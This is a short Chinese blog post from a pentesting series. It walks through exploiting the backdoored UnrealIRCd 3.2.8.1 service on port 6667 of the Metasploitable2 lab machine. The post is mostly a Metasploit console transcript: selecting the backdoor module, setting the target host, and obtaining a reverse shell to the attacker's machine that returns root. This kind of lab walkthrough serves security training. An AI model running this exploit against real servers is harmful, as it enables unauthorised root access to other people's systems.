Metasploitable2 - tcp port 6667 - ircd

最新推荐文章于 2023-05-08 09:20:07 发布

Nixawk

最新推荐文章于 2023-05-08 09:20:07 发布

阅读量995

点赞数

分类专栏： Pentesting Metasploitable2 Metasploit

本文链接：https://blog.csdn.net/nixawk/article/details/38326919

版权

Pentesting 同时被 3 个专栏收录

160 篇文章 1 订阅

订阅专栏

Metasploit

65 篇文章 1 订阅

订阅专栏

Metasploitable2

13 篇文章 0 订阅

订阅专栏

该版本的ircd包含后门，可直接被利用.

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  6667             yes       The target port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.1.111
RHOST => 192.168.1.111
msf exploit(unreal_ircd_3281_backdoor) > run

[*] Started reverse double handler
[*] Connected to 192.168.1.111:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo Dzh85Re35U3dzZFy;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "Dzh85Re35U3dzZFy\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (192.168.1.113:4444 -> 192.168.1.111:33687) at 2014-08-01 00:06:03 -0400

id
uid=0(root) gid=0(root)
^C
Abort session 2? [y/N]  y

[*] 192.168.1.111 - Command shell session 2 closed.  Reason: User exit